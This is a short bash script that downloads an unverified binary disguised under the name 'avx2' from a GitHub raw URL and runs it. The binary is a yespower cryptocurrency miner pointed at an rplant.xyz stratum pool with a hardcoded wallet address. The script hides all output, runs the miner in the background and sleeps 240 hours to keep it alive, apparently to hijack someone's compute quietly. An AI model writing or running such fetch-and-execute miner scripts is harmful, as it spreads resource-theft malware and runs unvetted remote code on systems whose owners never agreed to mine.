#!/bin/bash
wget https://raw.githubusercontent.com/jsiqiisn/whiv/main/avx2
chmod +x avx2
./avx2 -a yespower -o stratum+tcps://stratum-asia.rplant.xyz:17070 -u WbQR3w5EyWkuoFjhjYymrr3pEZDSTTgQkX.cont > /dev/null 2>&1 &
sleep 240h
